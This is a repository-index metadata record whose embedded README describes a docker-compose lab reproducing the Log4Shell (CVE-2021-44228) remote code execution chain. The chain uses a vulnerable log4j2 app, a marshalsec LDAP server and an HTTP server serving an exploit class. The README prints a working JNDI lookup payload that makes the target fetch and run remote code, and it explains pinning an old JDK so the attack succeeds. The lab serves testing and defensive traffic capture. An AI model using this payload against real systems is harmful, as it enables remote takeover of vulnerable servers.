{"id":26411381,"url":"https://github.com/alex-ilgayev/log4shell-dockerized","last_synced_at":"2025-03-17T20:33:31.182Z","repository":{"id":281343739,"uuid":"438336656","full_name":"alex-ilgayev/log4shell-dockerized","owner":"alex-ilgayev","description":"Log4Shell dockerized full chain","archived":false,"fork":false,"pushed_at":"2021-12-14T17:46:43.000Z","size":10,"stargazers_count":2,"open_issues_count":0,"forks_count":0,"subscribers_count":1,"default_branch":"main","last_synced_at":"2025-03-08T13:18:35.645Z","etag":null,"topics":["log4j2","log4shell"],"latest_commit_sha":null,"homepage":"","language":"Java","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/alex-ilgayev.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2021-12-14T17:10:36.000Z","updated_at":"2023-03-05T07:34:56.000Z","dependencies_parsed_at":"2025-03-08T13:28:41.286Z","dependency_job_id":null,"html_url":"https://github.com/alex-ilgayev/log4shell-dockerized","commit_stats":null,"previous_names":["alex-ilgayev/log4shell-dockerized"],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/alex-ilgayev%2Flog4shell-dockerized","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/alex-ilgayev%2Flog4shell-dockerized/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/alex-ilgayev%2Flog4shell-dockerized/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/alex-ilgayev%2Flog4shell-dockerized/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/alex-ilgayev","download_url":"https://codeload.github.com/alex-ilgayev/log4shell-dockerized/tar.gz/refs/heads/main","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":244105837,"owners_count":20398927,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["log4j2","log4shell"],"created_at":"2025-03-17T20:32:29.880Z","updated_at":"2025-03-17T20:33:31.166Z","avatar_url":"https://github.com/alex-ilgayev.png","language":"Java","funding_links":[],"categories":[],"sub_categories":[],"readme":"# Full-chain dockerized Log4Shell (CVE-2021-44228)\n\nLog4Shell (CVE-2021-44228) is a critical vulnerability in the popular log4j2 logging package.\nThis vulnerability is extremely easy to exploit, and was fixed in log4j2 version 2.15.\nThis repository goal is to automate and construct the environment through a single click by using `docker-compose` and containers.\nThis could be useful for:\n\n- Testing different java version easily.\n- Testing different payloads without constructing heavy setups.\n- Capturing easily the traffic for security protection measures.\n- More.\n\nThe setup contains:\n\n- `vuln` - A vulnarable code using log4j2\n- `marshalsec` - An LDAP server serving the exploit to log4j JDNI request\n- `http-server` - A simple python server serving the compiled exploit java class file\n\nFurther explanation can be reached here:\nhttps://research.checkpoint.com/2021/the-laconic-log4shell-faq/\nhttps://www.lunasec.io/docs/blog/log4j-zero-day/\n\n## Usage\n\nBuild and run all the containers\n\n```bash\nsudo docker-compose up --build\n```\n\nOnce everything is up and running, you could see the next message, indicating the exploit was successful:\n\n```\nmarshalsec_1   | Send LDAP reference result for Exploit redirecting to http://http-server:8888/Exploit.class\nvuln_1         | Hello from exploit!\nvuln_1         | 17:26:26.531 [main] ERROR log4j - ${jndi:ldap://marshalsec:1389/Exploit}\n```\n\nBehind the scenes, the vulnerable code is requesting the `Exploit` class from the LDAP server, and executes it.\nYou can freely modify the [Exploit](exploit/Exploit.java) file to make custom exploits, or the [log4j](vuln/src/main/java/log4j.java) file to change the malicious log.\n\n## Notes\n\nIn recent JDK version, the variable `com.sun.jndi.ldap.object.trustURLCodebase` is set to `false` by default, thus stopping effectively the attack. Thats why I set the java version to older than that.\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Falex-ilgayev%2Flog4shell-dockerized","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Falex-ilgayev%2Flog4shell-dockerized","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Falex-ilgayev%2Flog4shell-dockerized/lists"}